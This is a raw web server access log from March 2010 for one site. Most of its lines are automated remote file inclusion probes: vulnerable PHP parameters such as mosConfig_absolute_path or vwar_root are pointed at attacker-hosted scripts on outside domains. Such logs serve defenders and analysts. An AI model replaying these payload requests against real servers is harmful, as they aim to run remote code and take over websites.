124.136.23.172 - - [05/Mar/2010:06:46:28 -0800] "GET /logs/access_100224.log//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:46:28 -0800] "GET /include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:46:28 -0800] "GET /logs//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:46:46 -0800] "GET /logs/access_100224.log%20%20//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:46:46 -0800] "GET /include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:46:46 -0800] "GET /logs//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:06:48:27 -0800] "GET /logs/access_100226.log%20%20/historytemplate.php?cms[support]=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:06:48:27 -0800] "GET /logs/historytemplate.php?cms[support]=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:06:48:27 -0800] "GET /historytemplate.php?cms[support]=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:06:50:58 -0800] "GET /logs/access_100129.log%20%20//include.php?path[docroot]=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:53:44 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:53:44 -0800] "GET /logs/access_100128.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [05/Mar/2010:06:53:44 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
89.145.92.17 - - [05/Mar/2010:06:54:31 -0800] "GET /logs/access_100226.log/historytemplate.php?cms[support]=http://schoolwearzone.com/templates/beez/tmp/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:55:46 -0800] "GET /logs/access_100128.log//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:55:46 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [05/Mar/2010:06:55:46 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
208.80.193.28 - - [05/Mar/2010:06:57:13 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iebar; acc=; acc=none; (none))" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:59:48 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:59:48 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:59:48 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:06:59:59 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:07:02:45 -0800] "GET /ideal/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:03:06 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:03:06 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:03:06 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:03:06 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:03:06 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:03:06 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:07:03:19 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:07:03:19 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:07:03:19 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:03:19 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:03:19 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:03:20 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:03:28 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:03:28 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:03:29 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:07:04:16 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:04:28 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:04:48 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:07:05:03 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:05:09 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:07:05:31 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:05:35 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:07:05:58 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:06:32 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:07:07:42 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:07:56 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:07:09:16 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:07:11:17 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:07:11:17 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:07:11:19 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:12:21 -0800] "GET /skin/zero_vote/error.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:12:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:12:29 -0800] "GET /logs/access_100221.log%20%20//skin/zero_vote/error.php?dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [05/Mar/2010:07:12:35 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:07:14:11 -0800] "GET /bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:07:14:11 -0800] "GET /logs/access_100219.log//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:07:14:11 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:14:13 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:14:15 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:14:15 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [05/Mar/2010:07:14:17 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://idscan.fileave.com/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [05/Mar/2010:07:14:17 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://idscan.fileave.com/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [05/Mar/2010:07:14:17 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://idscan.fileave.com/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:14:34 -0800] "GET /logs/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:14:34 -0800] "GET /admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:14:36 -0800] "GET /logs/access_100224.log%20%20/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:15:24 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:15:24 -0800] "GET /logs/access_100205.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:15:24 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:15:24 -0800] "GET /logs/access_100126.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.251.181 - - [05/Mar/2010:07:15:33 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://idscan.fileave.com/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:16:00 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:16:02 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:16:02 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:16:02 -0800] "GET /logs/access_100205.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:07:16:02 -0800] "GET /logs/access_100126.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:16:02 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:16:06 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:17:32 -0800] "GET /logs/access_100131.log%20%20/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:17:51 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:01 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:01 -0800] "GET /logs/access_100206.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:01 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:07:18:05 -0800] "GET /logs/access_100208.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:07:18:05 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:07:18:05 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:10 -0800] "GET /logs/access_100126.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:18:10 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:18:10 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:18:15 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:25 -0800] "GET /logs/access_100206.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:25 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:25 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:30 -0800] "GET ///logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:30 -0800] "GET /logs/access_100206.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:30 -0800] "GET /logs////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:33 -0800] "GET /logs/access_100126.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:07:18:41 -0800] "GET /logs/access_100126.log%20%20////logs/access.log//write_update.php=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:19:11 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:19:11 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:19:13 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:19:19 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:19:19 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:19:19 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:19:35 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:07:19:42 -0800] "GET /logs/access_100126.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:19:50 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:20:04 -0800] "GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:20:09 -0800] "GET /logs/access_100128.log%20%20/yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:07:20:09 -0800] "GET /logs/yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:20:10 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:20:12 -0800] "GET /logs/access_100209.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:07:22:02 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:07:22:02 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:07:22:02 -0800] "GET /logs/access_100209.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:22:25 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:22:25 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:22:25 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:07:22:33 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:07:22:36 -0800] "GET /logs/access_100219.log%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:07:22:36 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
